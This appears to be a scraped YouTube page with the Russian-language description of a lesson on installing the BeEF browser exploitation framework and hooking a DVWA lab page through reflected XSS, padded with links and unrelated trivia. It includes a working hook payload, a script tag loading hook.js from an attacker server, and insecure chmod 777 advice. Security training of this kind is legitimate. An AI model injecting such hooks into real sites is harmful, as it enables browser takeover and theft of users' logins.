Скачать с ютуб 5.12.4 Установка Framework BeEF (зомби/уязв. маш./захват-контроль систем⪼ботнет). Подцеп к DVWA XSS в хорошем качестве

5.12.4 Установка Framework BeEF (зомби/уязв. маш./захват-контроль систем⪼ботнет). Подцеп к DVWA XSS

00:00 wget https://github.com/beefproject/beef/a... 00:34 🪇̶s̶u̶d̶o̶ ̶g̶e̶m̶ ̶i̶n̶s̶t̶a̶l̶l̶ ̶b̶u̶n̶d̶l̶e̶r̶ // правильно запаковать и собрать 00:49 Идём в epictet (зависит, где открыт терминал при команде wget) и разархивация (обратная архивация) 01:10 beef-master ⪼ скрипт ./install 01:34 Меняем стандартные данные учётной записи в config.yaml на Zak:Zak {после команды: chmod 777 config.yaml} 02:20 ./beef 02:55 UI URL: http://172.17.0.1:3000/ui/panel 03:28 Подцепляем первого своего зомби https://en.wikipedia.org/wiki/Chmod 🆓CHMOD⛔ / file types: - file, d directory, l link Sum RWX Permission 7 4(r) + 2(w) + 1(x) rwx read, write and execute 6 4(r) + 2(w) rw- read and write 5 4(r) + 1(x) r-x read and execute 4 4(r) r-- read only 3 2(w) + 1(x) -wx write and execute 2 2(w) w write only 1 1(x) --x execute only 0 0 --- none 📼5.12.4 Установка Framework BeEF (произведём своего зомби/уязвимая машина/захват-контроль систем⪼ботнет) и подцепимся к первой жертве DVWA XSS (Reflected). 🐂also an Install BeEF🐒 Could not find gem 'thin' in any of the gem sources listed in your Gemfile: ► cd ~ ► git clone https://github.com/beefproject/beef.git ► cd beef ► ./install ► Update the config.yaml with a more secure password (Yak:Yak) ► ./beef https://github.com/beefproject/beef/i... Взлом файлов⪼Приложение (доступ через браузер)⪼Веб-ориентированный⪼Использование браузера (данные, инфа и общение)⪼ Browers распространённая мишень хакеров (tool: BeEF [запускать команды у жертвы, красть логины и пароли...]) Код для добавления в веб-сайт и управления Brower: Hook: ◅script src="http://IP:3000/hook.js"▻◅/script▻ // IP - жертвы __________ Альтернативы BeEF: https://www.g2.com/products/beef/comp... https://linuxsecurity.expert/tools/be... https://slashdot.org/software/p/BeEF/... __________ 🐂🐒🐃 Using BeEF scripts for XSS attacks: https://whitehatinstitute.com/using-b... Зомби-скриптонг. Используем BeEF для продвинутых XSS-атак: https://xakep.ru/2016/03/17/beef/ The zombies strike back: Towards client-side BeEF detection / Зомби наносят ответный удар: на пути к обнаружению говядины на стороне клиента: https://ro.ecu.edu.au/cgi/viewcontent... Basics of using the Beef-XSS To Advanced + Bettercap!!:    • Basics of using the Beef-XSS To Advan...   Basic hacking concepts: Using BeEF to attack browsers:    • Basic hacking concepts: Using BeEF to...   __________ 💡Wget получает файлы с веб-сервера. Git-clone получает (клонирует на ваш компьютер) файлы из репозитория git . 💡BeEF/Browser Exploitation Framework, представляет собой инструмент, используемый этическими хакерами для выявления и использования уязвимостей в веб-браузерах. В отличие от многих других инструментов безопасности, которые фокусируются на уязвимостях на стороне системы или сервера, BeEF фокусируется на стороне клиента, а точнее, веб-браузера пользователя 💡Эпиктет (др. -греч. Έπίκτητος; ок. 50, Гиераполь, Фригия — 138, Никополь, Эпир) — древнегреческий философ-стоик; раб в Риме, потом вольноотпущенник; основал в Никополе философскую школу. 💡Комиссия по лицензированию и надзору (ZAK/Kommission für Zulassung und Aufsicht) является центральным органом, в котором совместно работают руководители 14 государственных органов СМИ. Он отвечает за одобрение и контроль общенациональных частных вещательных компаний и онлайн-СМИ. Их решения основаны на медиа-договоре. 💡Zack - воспроизведение короткого, резкого, толкающего движения , часто в удвоении Zack Zack! как приглашение к скорости. 💡Yak oder Jak — длинношерстный представитель семейства буйволовых . Он обитает в центре Азии, особенно в Гималаях. Название происходит из языка Тибета. Животное еще называют тибетским хрюкающим быком.